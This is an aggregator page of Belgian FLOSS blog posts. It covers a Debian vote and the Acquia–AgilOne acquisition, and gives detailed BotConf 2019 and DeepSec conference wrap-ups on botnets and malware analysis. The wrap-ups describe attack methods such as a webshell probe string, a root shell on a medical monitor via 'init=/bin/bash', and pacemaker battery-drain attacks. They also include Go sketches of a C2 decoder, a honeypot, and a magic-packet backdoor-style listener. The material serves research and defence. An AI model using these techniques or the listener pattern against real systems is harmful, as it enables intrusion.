Planet Grep

Planet'ing Belgian FLOSS people

Planet Grep is maintained by Wouter Verhelst. All times are in UTC.

December 12, 2019

I published the following diary on isc.sans.edu: “Code & Data Reuse in the Malware Ecosystem“:

In the past, I already had the opportunity to give some “security awareness” sessions to developers. One topic that was always debated is the reuse of existing code. Indeed, for a developer, it’s tempting not to reinvent the wheel when somebody already wrote a piece of code that achieves the expected results. From a time-saving perspective, it’s a win for developers, who can focus on other code. Of course, this can have side effects and introduce bugs, backdoors, etc., but that’s not today’s topic. Malware developers are also developers and have the same behavior. Code reuse has already been discussed several times… [Read more]

[The post [SANS ISC] Code & Data Reuse in the Malware Ecosystem has been first published on /dev/random]

We’ve all been there, right? You debug something, you try telnet to see if a port is open, and now you’re stuck in a telnet session.

December 11, 2019

I'm excited to announce that Acquia has signed a definitive agreement to acquire AgilOne, a leading Customer Data Platform (CDP).

CDPs pull customer data from multiple sources, clean it up and combine it to create a single customer profile. That unified profile is then made available to marketing and business systems to improve the customer experience.

For the past 12 months, I've been watching the CDP space closely and have talked to a dozen CDP vendors. I believe that every organization will need a CDP (although most organizations don't realize it yet).

Why AgilOne?

According to independent research firm The CDP Institute, CDPs are a part of a rapidly growing software category that is expected to exceed $1 billion in revenue in 2019. While the CDP market is relatively new and small, a plethora of CDPs exist in the market today.

One of the reasons we really liked AgilOne is their machine learning capabilities — they will give our customers a competitive advantage. AgilOne supports machine learning models that intelligently segment customers and predict customer behaviors (e.g. when a customer is likely to purchase something). This allows for the creation of next-best-action models that optimize offers and messages to customers on a 1:1 basis.

For example, lululemon, one of the most popular brands in workout apparel, collects data across a variety of online and offline customer experiences, including in-store events and website interactions, commerce transactions, email marketing, and more. AgilOne helped them integrate all those systems and create unified customer data profiles. This unlocked a lot of data that was previously siloed. Once lululemon better understood its customers' behaviors, they leveraged AgilOne's machine learning capabilities to increase attendance to local events by 25%, grow revenue from digital marketing campaigns by 10-15%, and increase site visits by 50%.

Another example is TUMI, a manufacturer of high-end suitcases. TUMI turned to AgilOne and AI to personalize outbound marketing (like emails, push notifications and one-to-one chat), smarten its digital advertising strategy, and improve the customer experience and service. The results? TUMI sent 40 million fewer emails in 2017 and made more money from them. Before AgilOne, TUMI's e-commerce revenue decreased. After they implemented AgilOne, it increased sixfold.

Fundamentally improving the customer experience

Having a great customer experience is more important than ever before — it's what sets competitors apart from one another. Taxis and Ubers both get people from point A to B, but Uber's customer experience is usually superior.

Building a customer experience online used to be pretty straightforward; all you needed was a simple website. Today, it's a lot more involved.

The real challenge for most organizations is not to redesign their website with the latest and greatest JavaScript framework. No, the real challenge is to drive customer experiences across all the different channels — including web, mobile, social, email and voice — and to make those experiences highly relevant.

I've long maintained that the two fundamental building blocks to delivering great digital experiences are (1) content and (2) user data. This is consistent with the diagram I've been using in presentations and on my blog for many years where "user profile" and "content repository" represent two systems of record (though updated for the AgilOne acquisition).

A diagram that shows organizations need both good user data and good content to deliver relevant digital experiences.

To drive results, wrangling data is not optional

To dramatically improve customer experiences, organizations need to understand their customers: what they are interested in, what they purchased, when they last interacted with the support organization, how they prefer to consume information, etc.

But as an organization's technology stack grows, user data becomes siloed within different platforms:

A diagram that illustrates how user data is siloed within different platforms, including web, email marketing, commerce, and CRM

When an organization doesn't have a 360º view of its customers, it can't deliver a great experience to its customers. We have all interacted with a help desk agent who didn't know what we recently purchased, asked us questions we had answered multiple times before, or wasn't aware that we had already received some troubleshooting help through social media.

Hence, the need for integrating all your backend systems and creating a unified customer profile. AgilOne addresses this challenge, and has helped many of the world's largest brands understand and engage better with their customers.

A diagram that shows how user data is unified with AgilOne across web, email marketing, commerce, social media, and CRM.

Acquia's strategy and vision

It's easy to see how AgilOne is an important part of Acquia's vision to deliver the industry's only open digital experience platform. Together with Drupal, Lift and Mautic, AgilOne will allow us to redefine the customer experience stack. Everything is based on Open Source and open APIs, and designed from the ground up to make it easier for marketers to create relevant, personal campaigns across a variety of channels.

A diagram shows how Acquia solutions unify experience creation, content and user data across different platforms.

Welcome to the team, AgilOne! You are a big part of Acquia's future.

The country in crisis: all the country's editors-in-chief are writing opinion pieces!

Hundreds of women heading to court. Christine Mussche is already dreaming herself rich: three hundred invoices of a few thousand euros each! That's a villa. It will no doubt become a usufruct. Because her health resort for disgruntled women can afterwards still be turned into a sauna and massage parlor, or a veritable pilgrimage site for Belgian feminism.

With what the honorable lawyer will probably earn from this, we could also have solved the budget deficit of an average-sized village, or built a school or a typical municipal swimming pool.

Meanwhile: we also haven't had a government for months. Nobody cares.

December 10, 2019

Just sent in my vote. After carefully considering what I consider to be important, and reading all the options, I ended up with 84312756.

There are two options that rule out any compromise position; choice 1, "Focus on systemd", essentially says that anything not systemd is unimportant and we should just drop it. At the same time, choice 6, "support for multiple init systems is required", essentially says that you have to keep supporting other systems no matter what the rest of the world is doing lalala I'm not listening mom he's stealing my candy again.

Debian has always been a very diverse community; as a result, historically, we've provided a wide range of valid choices to our users. The result of that is that some of our derivatives have chosen Debian to base their very non-standard distribution on. It is therefore, to me, no surprise that Devuan, the very strongly no-systemd distribution, was based on Debian and not Fedora or openSUSE.

Personally I consider this variety in our users to be a good thing, and something to treasure; so any option that essentially throws that away, like choice 1, is not something I could live with. At the same time, the world has evolved, and most of our users do use systemd these days, which does provide a number of features over and above the older sysvinit system. Ignoring that fact, like option 6 does, is unreasonable in today's world.

So neither of those two options are acceptable to me.

That just leaves the other available options. All of those accept the fact that systemd has become the primary option, but differ in the amount of priority given to alternate options. The one outlier is option 5; it tries to give general guidance on portability issues, rather than commenting on the systemd situation specifically. While I can understand that desire, I don't agree with it, so it definitely doesn't get first position for me. At the same time, I don't think it's a terrible option, in that it still provides an opinion that I agree with. All in all, it barely made the cutoff above further discussion -- but really only barely so.

How did you vote?

December 06, 2019

It’s a classic issue for BotConf attendees: the last day is always a little bit tougher due to the social event organized every Thursday night. This year, we were in a French region where good wines are produced, and the event took place at the “Cité du Vin”. The night was short but I was present at the first talk! Ready as usual!

The first talk was “End-to-end Botnet Monitoring with Automated Config Extraction and Emulated Network Participation” by Kevin O’Reilly and Keith Jarvis. Sometimes, you hesitate to attend the first conference of the day due to a lack of motivation and you have to force yourself.

Today, it was really worth waking up on time to attend this wonderful talk. It started with a comparison of two distinct approaches to analyzing malware samples: emulator vs. sandbox. For a sandbox, you provide a sample and the results can be used as input for an emulator: C2 servers, IPs, encryption keys, etc. (and vice-versa). The next part of the talk was dedicated to CAPE (“Config And Payload Extraction”), a fork of Cuckoo with many decoding features that help to unpack and analyze samples via the browser. It has an API monitor, a debugger, a dumper, an import reconstructor, etc. Many demos were performed. I’ll definitely install it to replace my old Cuckoo instance! The project is here.

The next talk was presented by Suguru Ishimaru, Manabu Niseki and Hiroaki Ogawa: “Roaming Mantis: A melting pot of Android bots“. This campaign started in Japan in 2018 and compromised residential routers. A classic attack: DNS settings were changed to redirect victims to rogue websites that… delivered malware samples! The talk covered the malware samples that were used in the campaign:

  • MoqHao
  • FakeSpy
  • FakeCop
  • FunkyBot

For each of them, the malware was analyzed in the same way: how it was delivered, how devices were compromised, and its connections with the C2. The relation between them? They used the same technique to steal money. The money-laundering process was also reviewed.

After a welcome coffee break, “The Cereals Botnet” was presented by Robert Neumann and Gergely Eberhardt. This time, no Android, no Windows but… NASes! (storage devices). This makes it a pretty unique botnet of approximately 10K bots. The target was mainly D-Link NAS devices (consumer models).


They started by explaining how the NAS was compromised using a vulnerability in a CGI script. To better understand how it worked, they simply connected a NAS to the wild Internet (note: don’t try this at home!) and were able to observe the behavior of the attacker (unusual HTTP requests, outgoing traffic and suspicious processes). The exploit went via the SMS notification system in system_mgr.cgi. Once compromised, a backdoor was installed, along with extra software components (a VPN client), and persistence was implemented too. I liked the way the bot communicated with the C2: via an RSS feed! Easy! Finally, they explained that the vulnerability was patched by the vendor (years later!) but many devices remain unpatched…

The next talk presented the results of research by a student who tried to develop a tool to improve the generation of YARA rules: “YARA-Signator: Automated Generation of Code-based YARA Rules”, presented by Felix Bilstein and Daniel Plohmann.

No need to present YARA. A fact is that most public rules (73%) are based on text strings, but code-based rules are nice: they are robust, harder for attackers to circumvent, and easier to generate automatically, but painful to write manually! A tool can be used for this purpose: YARA-Signator. The approach was to create signatures based on families from Malpedia. First they explained how the tool works, then the results. Interesting if you’re a big fan of YARA. The code is here.

After lunch, the scheduled talk was “Using a Cryptographic Weakness for Malware Traffic Clustering and IDS Rule Generation” by Matthijs Bomhoff and Saskia Hoogma. This is the kind of talk that I fear after a nice lunch… The idea of the talk was to show that bad encryption implementations by attackers can be used to track them.

There was no coffee break foreseen this afternoon, so we continued with three talks in a row. “Zen: A Complex Campaign of Harmful Android Apps” by Lukasz Siewierski. A common question related to malware samples is: are all apps coming from the same author (or group)? Lukasz explained the different techniques used by “Zen” to perform malicious activities:

  • Repacking with a custom ad SDK
  • Click fraud
  • Rooting the device
  • Fake Google account creation
  • Code injection
  • Persistence

It was a review of another Android malware…

Martijn Grooten continued with “Malspam is Different Spam“. Martijn explained that, while spam is not a new topic, it remains a common infection vector. Why are some emails more likely to pass through our filters? A few words about spam filtering; we rely on:

  • Block lists (IP, domains)
  • Sender verify (SPF, DKIM, DMARC, etc)
  • Content filtering (viagra, casino, …)
  • Link & attachments scanning

Some emails go to spam traps and the results are sent to the spam filter (which can also update itself). Spam scales badly. Then, Martijn showed some examples of better-crafted emails that stand a good chance of not being blocked.

Finally, the conference ended with “Demystifying Banking Trojans from Latin America” by Juraj Hornák, Jakub Soucek and Martin Jirkal. They presented the LATAM banking malware landscape (targeting Spanish- and Portuguese-speaking people). They explained the techniques used by the different malware families, with the final goal of seeing the relations between them:

I liked the “easter egg and human error” part, where they explained some mistakes made by the attackers, like… keeping a command in the code to spawn a calc.exe 😉

This edition could be called the “Android Malware Edition”, given the number of presentations related to Android! (Like we had the “DGA Edition” a few years ago.) This wrap-up closes these three days of BotConf 2019! Here are some stats provided by the organization:

  • CFP: 73 submissions
  • 3 workshops
  • 1 keynote
  • 28 presentations
  • 50 speakers
  • 1730 minutes of shared knowledge.

As usual, they also disclosed the location of the 2020 edition: we will be back in Nantes!

[The post BotConf 2019 Wrap-Up Day #3 has been first published on /dev/random]

December 05, 2019

The second day is over. Here is my daily wrap-up. Today was a national strike day in France and a lot of problems were expected with public transport. However, the organization provided buses to help attendees travel between the city center and the venue. Great service as always 😉

After some coffee, the day started with another TLP:AMBER talk: “Preinstalled Gems on Cheap Mobile Phones” by Laura Guevara. So, to respect the TLP, nothing will be disclosed. Just keep in mind that if you use cheap Android smartphones, you get what you paid for…

Then, Brian Carter presented “Honor Among Thieves: How Stealer Malware Fuels an Underground Economy of Compromised Accounts”. It started with facts: attackers make mistakes and leak information online, like panels, configuration files or logs. You can find this information just via a browser, no need to hack them back.

Brian’s research goals were:

  • Understand the value of stolen data
  • Develop tools to collect and parse data
  • Collect info to help identify malware families based on their C2
  • Develop detection rules to catch them

But, very importantly, we cannot commit crimes, contribute to malicious activities, or harm victims of malware. The golden rule here is: be ethical! The research also had limitations; it’s impossible to collect everything and the data may not be representative! What was the collection process? Terabytes of data, 1M stealer log archives, many panels, builders, chat logs, forum posts, and market listings. Again, “stolen data” were collected from ethical sources like VT, shares, open directories. Brian also commented on the economics of stealers: the market is relatively small today, only a few criminals are successful in their business, and stealer malware is low-volume. An example price list was shown.

Then, once you have collected so much data, what do you do with it? Warn users if they are compromised, research adversaries, develop countermeasures, organize take-downs? This was an interesting talk.

The next speakers were Alexander Eremin and Alexey Shulmin, who presented “Bot with Rootkit: Update and Mine!”. The research started with a “nice” sample that installed a Microsoft patch. Cool, isn’t it? Of course, the dropper was obfuscated and, once decoded, it used the classic VirtualAlloc() and GetModuleHandleA() to decrypt the data.

When they were able to extract strings, they continued to investigate and discovered interesting behaviors. First, the developer was nice enough to leave debugging comments via a write_to_log() function. The malware checked the OS version and the keyboard layout and created a mutex. Until now, nothing fancy, but the malware also installed a Microsoft patch, if not already present: KB3033929. Why? The patch was required for check_crypt32_version() and SHA-2 support! They then explained how C2 communications are performed: over HTTP, encrypted with RC4 and Base64-encoded (see the decoding sketch after the list below). Finally, a rootkit is installed to deploy a cryptominer. The rootkit is similar to Necurs and uses IOCTL-like registry keys. Examples of supported commands:

  • 0x220004 – update rootkit
  • 0x220008 – update payload
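
To illustrate the C2 encoding described above, here is a minimal Go sketch of the Base64 + RC4 decoding, assuming a known key; the key and message below are hypothetical, nothing comes from the actual malware:

package main

import (
    "crypto/rc4"
    "encoding/base64"
    "fmt"
    "log"
)

// decodeC2 reverses the encoding described in the talk:
// Base64 decode first, then RC4 decrypt with the known key.
func decodeC2(encoded string, key []byte) ([]byte, error) {
    raw, err := base64.StdEncoding.DecodeString(encoded)
    if err != nil {
        return nil, err
    }
    c, err := rc4.NewCipher(key)
    if err != nil {
        return nil, err
    }
    out := make([]byte, len(raw))
    c.XORKeyStream(out, raw)
    return out, nil
}

// encryptDemo builds a Base64(RC4(msg)) blob so the example is self-contained.
func encryptDemo(msg string, key []byte) string {
    c, _ := rc4.NewCipher(key)
    buf := make([]byte, len(msg))
    c.XORKeyStream(buf, []byte(msg))
    return base64.StdEncoding.EncodeToString(buf)
}

func main() {
    key := []byte("hypothetical-key") // not the real malware key
    enc := encryptDemo("update payload", key)
    dec, err := decodeC2(enc, key)
    if err != nil {
        log.Fatal(err)
    }
    fmt.Printf("%s\n", dec)
}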

After a caffeine refill, it was the turn of Tom Ueltschi who presented “DESKTOP-Group – Tracking a Persistent Threat Group (using Email Headers)”. Tom is a regular speaker at Botconf and always provides good content. This talk was tagged as TLP:GREEN. Good idea: he will try to make a “white” version of his slides as soon as possible. Remember that TLP:GREEN means “Limited disclosure, restricted to the community.”

Before the lunch break, two short presentations were scheduled. “The Bagsu Banker Case” by Benoît Ancel. Sorry, TLP:AMBER again.

The following talk was “Tracking Samples on a Budget” by <redacted>. It covered a personal project that has been running for two years now, explaining how to acquire a collection of malware samples… as a student, with no budget! What are the (free) sources available? Open-source repositories, honeypots, pivots, feeds, sandboxes, existing malware zoos like malshare or malc0de, etc. You can also run your own honeypot, but it’s difficult to deploy a lot of them. The talk covered the components put in place to crawl the web and how to avoid some stupid limitations that you’ll face. Then comes the post-processing:

  • Upload new samples to VT
  • Enrichment (metadata, strings, …)
  • YARA rules!
  • Pivots

A good idea is also to search recursively for open directories, which remain a goldmine. Here is the sample-tracking lifecycle as implemented:

Acquire URL > Crawl > Download > Postprocessing > Store > Pivot
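
The same lifecycle maps naturally onto a pipeline of stages connected by channels; here is a minimal Go sketch of that architecture (the stage bodies are stubs of my own, the project’s actual code was not shown):

package main

import "fmt"

func main() {
    urls := make(chan string)
    files := make(chan string)
    stored := make(chan string)

    go func() { // Acquire URL > Crawl
        for _, u := range []string{"http://example.com/open-dir/a.exe"} {
            urls <- u
        }
        close(urls)
    }()

    go func() { // Download > Postprocessing (VT upload, enrichment, YARA, ...)
        for u := range urls {
            files <- u // stub: download and enrich here
        }
        close(files)
    }()

    go func() { // Store > Pivot
        for f := range files {
            stored <- f // stub: archive, then pivot to new URLs
        }
        close(stored)
    }()

    for s := range stored {
        fmt.Println("archived sample from:", s)
    }
}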

What about the results? Running for two years, it has discovered 270K unique samples (25% of them not on VT), collected 600GB of data, and 78% of the samples have a 5+ score on VT. I had the opportunity to talk with the speaker later: the code has been running fine for two years and just does the job. An amazing project!

After the lunch, we had another restricted presentation (sorry, interesting content can’t be disclosed) – TLP:RED – by Thomas Dubier and Christophe Rieunier: “Botnet Tracking Story: from Spam Mail to Money Laundering”.

The next talk was “Finding Neutrino Botnet: from Web Scans to Botnet Architecture” by Kirill Shipulin and Alexey Goncharov. This research started with some interesting hits on a honeypot. They adapted the honeypot to respond positively and mimic a webshell. The scan was brute-forcing different webshells with a strange command: “die(md5(Ch3ck1ng))”. The malware they found had a classic behavior: check if already installed, exfiltrate system information and download/execute a payload (a cryptominer in this case). It implemented persistence via WMI, was fileless and also killed its competitors.
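
Answering such a probe is cheap: the scanner checks whether the “webshell” echoes md5("Ch3ck1ng"), so a honeypot can reply with exactly that digest. A minimal sketch in Go (the port and catch-all path are my own choices):

package main

import (
    "crypto/md5"
    "encoding/hex"
    "fmt"
    "log"
    "net/http"
)

func main() {
    // Precompute the digest the scanner expects to see in the response.
    sum := md5.Sum([]byte("Ch3ck1ng"))
    digest := hex.EncodeToString(sum[:])

    http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
        log.Printf("probe from %s: %s", r.RemoteAddr, r.URL) // record the hit
        fmt.Fprint(w, digest)                                // pretend the command ran
    })
    log.Fatal(http.ListenAndServe(":8080", nil))
}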

The next malware to be analyzed was BackSwap: “BackSwap Malware Campaign Evolution” by Carlos Rubio Ricote and David Pastor Sanz. This malware was found by ESET in May 2018 in trojanized apps (OllyDbg, FileZilla, ZoomIt, …). It used position-independent code (PIC) and shellcode hidden in BMP images (see the DKMC tool). They explained how the malware worked, how the configuration was encrypted and, once decoded, what the parameters were: the statistics URL, the C2, the User-Agent to use, and the injection delimiter. They decrypted the web injects and explained the techniques used: via the navigation bar or the developer console. Then, they reviewed some discovered campaigns targeting banks in Poland and Spain.

After the afternoon coffee break, Mathieu Tartare came on stage to talk about “Winnti Arsenal: Brand-new Supplies“. Winnti is a group that is often cited in the news and that compromised multiple organizations (telcos, software editors, healthcare, gambling, etc.). They are specialized in supply-chain attacks. They appear to have been active since 2013 (first public report) and in 2017… there was the famous CCleaner case! In 2018, the gaming industry was compromised. The first part of this talk covered this. The technique used by the malware was CRT patching: a function is called to unpack/execute the malicious code before returning to the original code. The payload was packed with a custom RC4-based packer. The first stage is a downloader that gets its C2 config, then gathers information about the victim’s computer. Amongst other things, the C: drive name and volume ID are exfiltrated. The second stage will decrypt a payload that was encrypted using… the volume ID! Finally, a cryptominer is installed. Mathieu also covered two backdoors: PortReuse, which works like good old port-knocking (it sniffs network traffic and waits for a specific magic packet), and ShadowPad.
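
PortReuse itself sniffs packets on a port that is already in use; as a simpler illustration of the magic-packet idea only, here is a hedged Go sketch of a service that stays silent unless a connection starts with a made-up magic value:

package main

import (
    "bytes"
    "io"
    "log"
    "net"
)

var magic = []byte("KNCK") // hypothetical magic bytes, not Winnti's

func main() {
    ln, err := net.Listen("tcp", ":9000")
    if err != nil {
        log.Fatal(err)
    }
    for {
        conn, err := ln.Accept()
        if err != nil {
            continue
        }
        go func(c net.Conn) {
            defer c.Close()
            hdr := make([]byte, len(magic))
            // Read the first bytes; anything but the magic value is ignored.
            if _, err := io.ReadFull(c, hdr); err != nil || !bytes.Equal(hdr, magic) {
                return
            }
            c.Write([]byte("activated\n")) // a real backdoor session would start here
        }(conn)
    }
}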

The last talk for today was “DFIR & Crisis Management – Post-mortems & Lessons Learned in the Pain from the Field” by Vincent Nguyen. He was involved in many security incidents and explained some interesting facts about them: how they worked, what they found (or not 😉) and also, very importantly, the lessons learned to improve the IR process.

The schedule ended with a set of lightning talks: 19 talks of 3 minutes each, with lots of interesting information, tools, stories, etc.

[The post BotConf 2019 Wrap-Up Day #2 has been first published on /dev/random]

If you’re setting up an Ubuntu 18.04 LTS server, you might want to give it a static IP address instead of one assigned by your router over DHCP.

December 04, 2019

Hello from Bordeaux, France where I’m attending the 7th edition (already!) of the BotConf security conference dedicated to fighting botnets. After Nantes, Nancy, Paris, Lyon, Montpellier, Toulouse and now Bordeaux, their “tour de France” is almost complete. What will be the next location? I attended all the previous editions and many wrap-ups are available on this blog. So, let’s start with the 2019 edition!

The conference was kicked off by Eric Freyssinet. This year, they received 73 submissions to the call for papers and organized 3 workshops (held yesterday). The selection process was difficult and, according to Eric, we can expect interesting talks.

After the introduction, the first talk was “DeStroid – Fighting String Encryption in Android Malware”, presented by Daniel Baier. He worked on this topic with Martin Lambertz.

Analyzing Android malware is not that hard because most developers use the standard API and applications can easily be decompiled. So, malware authors have to use alternative techniques to obfuscate their interesting content. One of these is the use of encryption to hide strings; they are decrypted at run time. As you can imagine, doing this process manually is a pain. To test the DeStroid tool, they used the data set provided by Malpedia (also presented at BotConf previously). They identified three techniques used to encrypt strings: using a string repository, passing strings to a decryption routine, and via native libraries. Each technique was reviewed by Daniel. Statistically, 52% of the tested Android samples use string encryption and 56% of those use the “direct pass” method. The DeStroid tool was also compared to other solutions like JMD, Deobfuscator or Dex-Oracle. The tool is available here if you’re interested.

The next speaker was Marco Riccardi, who presented “Golden Chickens: Uncovering A Malware-as-a-Service (MaaS) Provider and Two New Threat Actors Using It“. The talk was flagged as TLP:AMBER so I won’t disclose details about it. Just the same remark as usual with this kind of “sensitive” slides: can you trust a room full of 500 people? I liked a slide (without any confidential information) that explained how NOT to do attribution:

IR > Found sample > Use technique “X” > Google for “technique X” > Found references to “China” > We are attacked by China > Case closed

The next talk focused on the gaming industry. I’m definitely not a game addict, so I’m always curious about what happens in this field. Basically, like in any domain, if some profit can be made, bad guys are present! With huge profits to be made and millions of players as targets, it is normal to see attacks against big names like Counter-Strike. Ivan Korolev and Igor Zdobnov presented “Unrevealing the Architecture Behind the Counter-Strike 1.6 Botnet: Zero-Days and Trojans”. Do you remember that Counter-Strike was born in 1999? What’s the business behind CS 1.6? People want to play with more and more people. Servers need to be “promoted” to attract more gamers; “boosting” is the technique used to attract new players. If it can be performed with good & clean techniques, it can also be performed via malware. Ivan & Igor reviewed the different vulnerabilities found in the CS client and how they were (ab)used to build the botnet. Vulnerabilities were found in the parsing of SAV files (saved games) and BMP files. By exploiting vulnerabilities in the game, the client becomes part of a botnet. A rogue server can issue commands to a client, like:

  • redirecting players to another server
  • tampering with configs
  • changing the behavior of the game

In the next part of the presentation, the trojan Belonard was described. It has been active since May 2017 and constantly uses new exploits & modules. Finally, they explained the take-down process.

After the lunch break, the keynote was presented by Gilles Schwoerer and Michal Salat. Michal works for an AV vendor and Gilles works for the French law enforcement services. Their keynote was called “Putting an end to Retadup“.

What is Retadup? Michal started the technical part and explained the facts around this malware: it’s a worm that infected 1.3M+ computers via malicious LNK files. It’s not only a botnet but also a malware platform used by others to distribute more malware. The original version was developed in AutoIt and implements persistence and extraction of the victim’s details. It also implements a lot of anti-analysis techniques. Communication with the C2 is performed via a hardcoded list of domains and simple HTTP GET requests, Base64- or hex-encoded. When the malware was discovered and analyzed, the C2 was found to be located in France. That was the second part of the keynote, presented by Gilles, who explained the take-down process. Their plan was to serve an empty update to the bots to make them inactive. This method did not remove the infection but was less dangerous for the end-user. US agencies were also involved, redirecting the DNS to the replacement C2 server deployed by the French police. This keynote was a great example of collaboration between a vendor and law enforcement.

The next presentation was “Android Botnet Analysis – Shaoye Botnet” by Min-Chun Tsai, Jen-Ho Hsiao and Ding-You Hsiao. Like the previous talk, it reviewed another malware targeting Android devices. In Chinese, “Shaoye” means “young master”. They analyzed two versions of the malware. The first one used DNS hijacking in residential routers to redirect victims to a rogue website; the second version used compromised websites to spread the malware. In the first version, a fake Facebook app was installed and, in the second, a fake Sagawa Express application (Sagawa is a major transportation company in Japan). The malware samples were fully analyzed to explain how they work.

After a welcome coffee break, a very interesting talk was presented by Piotr Bialczak and Adrian Korczak: “Tracking Botnets with Long Term Sandboxing”. The idea behind the research was to improve the analysis of bots by keeping them in a sandbox for a long period of time. We know that reverse engineering malware costs a lot of time, so we use sandboxes as much as possible. The biggest constraint is the time allowed for execution, usually a few minutes. Malware developers know this and make their malware wait longer than the typical sandbox timeout, increasing the chances that the sandbox gives up by itself. They created an “LTS” (Long Term Sandboxing) system that is optimized to let a bot run for a long time without the usual technical constraints. Based on QEMU and a system of external snapshots, combined with other tools like an ELK stack and Moloch, they are able to reduce CPU usage, network bandwidth, etc. They analyzed 20 families of well-known botnets and showed interesting information learned at the network level, from SMTP traffic or DGAs. For example, it was possible to detect unusual protocols and traffic to non-standard ports.

The next talk was “Insights and Trends in the Data-Center Security Landscape” by Daniel Goldberg and Ophir Harpaz. There were some changes but I covered this talk last week at DeepSec (see my wrap-up here).

Then, Dimitris Theodorakis and Ryan Castellucci presented “The Hunt for 3ve“. Here again, another family of malware was dissected. This one targeted online ads. Yes, ads remain a business. A few numbers: 1.8M+ infected computers, 3B+ ad requests/day, 10K+ spoofed domains, 60K+ accounts. 3ve used three techniques that were reviewed by Dimitris and Ryan:

  • Boaxxe (residential proxy)
  • BGP hijacking
  • Kovter

Here again, after the technical details, they explained the take-down process.

Finally, the first day ended with “Guildma: Timers Sent from Hell”, presented by Adolf Streda, Luigino Camastra, and Jan Vojtešek. This time, the analyzed malware was not only a RAT but also spyware, a password stealer and banking malware. The malware was spread through spam campaigns and mainly targeted Brazil at first; later, more countries were targeted.

That’s the end of day 1! Many botnets were covered, always with the same approach: hunt, find samples, analyze them, learn how they work and organize the take-down. See you tomorrow for the second wrap-up!

[The post BotConf 2019 Wrap-Up Day #1 has been first published on /dev/random]

December 01, 2019

Once upon a time I wrote a weekly newsletter on Linux, open source & web development.

November 30, 2019

November 29, 2019

Here we go for the second wrap-up! DeepSec is over; I’m flying back to Belgium tomorrow. My first choice today was to attend “How To Create a Botnet of GSM-devices” by Aleksandr Kolchanov. Don’t forget that GSM devices are not only “phones”. Aleksandr covered devices like alarm systems, electric sockets, smart-home controllers, industrial controllers, trackers and… smartwatches for kids!

They all have features like sending notifications via SMS or calling pre-configured numbers, but they can also be configured or polled via SMS. Examples of attacks? Brute-force the PIN code, spoof calls, use “hidden” SMS commands. Ok, but what are the reasons to hack them? There are direct attacks (unlock the door, steal stuff) or spying (abuse the built-in microphone). Attacks on property are also interesting: switch off electric devices (a water pump, a heating system). Terrorism or political actions? Financial attacks (call or send SMS to premium numbers)? Why a botnet? To earn some money! Use it to send huge amounts of SMS, but also to DoS or for political/terrorist actions: can you imagine thousands of alarms going off at the same time? Thanks to powerful marketing, people buy these devices, so we have many of them in the wild:

  • Default settings
  • Stupid vulnerabilities
  • Not properly installed
  • Insecure by default
  • Cheap!
  • Absence of certification

After the introduction, Aleksandr explained how he performed attacks against different devices. It’s easy to hack them, but the real challenge is to find targets. How? You can do a mass scan and call all numbers, but it will cost money and some operators will detect you (“Why are you calling xxx times per day?”). How to search without making a call? There are web services provided by some operators that help to get info about numbers in use; there are open APIs, databases, leaked data, etc. Once you have enough valid devices, it’s time to build the botnet:

Scan > Identify > Attack > Change settings > Profit!

It was an interesting talk to kick off the day!

The next talk was about… pacemakers! Wait, everything has been said about those devices, right? A lot of material has already been published; the big story was in 2017, when a big flaw was discovered. The talk, presented by Tobias Zillner, was called “500.000 Recalled Pacemakers, 2 Billion $ Stock Value Loss – The Story Behind”.

When you need to assess such medical devices, where do you get one? From a second-hand webshop! Just have a look at dotmed.com; their stock of medical devices is awesome! The ecosystem tested was: pacemakers, programmers, home monitors and “Merlin.net”, alias “the cloud”. The first attack vector covered by Tobias was the new generation of devices that use wireless technology (SDR): low power, short range (2m), 401-406MHz. How to find technical specs? Just check the FCC ID and search for it. Google always remains your best friend. The vulnerabilities found were an energy-depletion attack (draining the battery) and a… crash of the pacemaker! The next target was the “Merlin@Home” device, which is a home monitoring system. They are easy to find on eBay:

Just perform an attack like against any embedded Linux device: connect a console, boot it, press a key to get the bootloader, change the boot command to add “init=/bin/bash” like on any Linux, and boot in single-user mode! Once inside the box, it’s easy to find a lot of data left by developers (source code, SSH keys, encryption keys, …). The second part of the talk was dedicated to the full-disclosure process.

After a short coffee break, Fabio Nigi presented “IPFS As a Distributed Alternative to Logs Collection”. The idea behind this talk was to try to solve a classic headache for people involved in log management tasks. This can quickly become a nightmare due to ever-changing topologies, the number of assets, and the amount of logs to collect and process. Storage is a pain to manage.

So, Fabio had the idea to use IPFS. IPFS means “InterPlanetary File System”; it is a P2P distributed file system that helps to store files in multiple locations. He introduced the tool and how it works (it looks interesting, I wasn’t aware of it). Then he demonstrated how to interconnect it with a log collection solution using different tools like an IPFS gateway, React, Brig or Minerva. It’s an interesting approach; however, the project is still in the development phase (as stated on the website)…

There were many interesting talks today and, with a dual-track conference, it’s not always easy to choose the one that will be the most entertaining or interesting. My next choice was “Extracting a 19-Year-Old Code Execution from WinRAR” by Nadav Grossman.

WinRAR is a well-known tool that handles many archive formats. As the tool is very popular, it’s a great target for attackers because it is installed on many computers! After a very long part about fuzzing (the techniques, tools like WinAFL), Nadav explained how the vulnerability was found. It was located in a DLL used to process ACE files. Many details were disclosed and, if you are interested, there is a blog post available here. Note that since the vulnerability was found and disclosed, support for ACE archives has been removed from the latest versions of WinRAR!

After the lunch break, I attended “Setting up an Opensource Threat Detection Program” by Lance Buttars (Ingo Money). This was an interesting talk about tools that you can deploy to protect your web services, but also to counterattack the bad guys. Many tools are used in Lance’s arsenal (ModSecurity, reverse proxies, Fail2ban, etc.).

Lance also explained what honeypots are and the different types of data that you can collect: domains, files, ports, SQL tables or databases. For each type, he gave some examples. Note that “active defense” is not allowed in many countries!

And the day continued with “Once Upon a Time in the West – A story on DNS Attacks” by Valentina Palacín and Ruth Esmeralda Barbacil. They reviewed well-known DNS attack techniques (DNS tunneling, hijacking, and poisoning), then presented a timeline of major threats that affected DNS services and abused the protocol, like:

  • DNSChanger (Operation Ghost Click)
  • Syrian Electronic Army
  • Craigslist hijack
  • OilRig (suspected Iranian)
  • Project Sauron (suspected USA)
  • DarkHydrus
  • Bernhard PoS
  • FIN7
  • DNSpionage
  • Sea Turtle

For each of them, they mapped the attack to the MITRE ATT&CK framework. Nothing really new, but a good recap that concluded that DNS is a key protocol and that it must be carefully controlled.

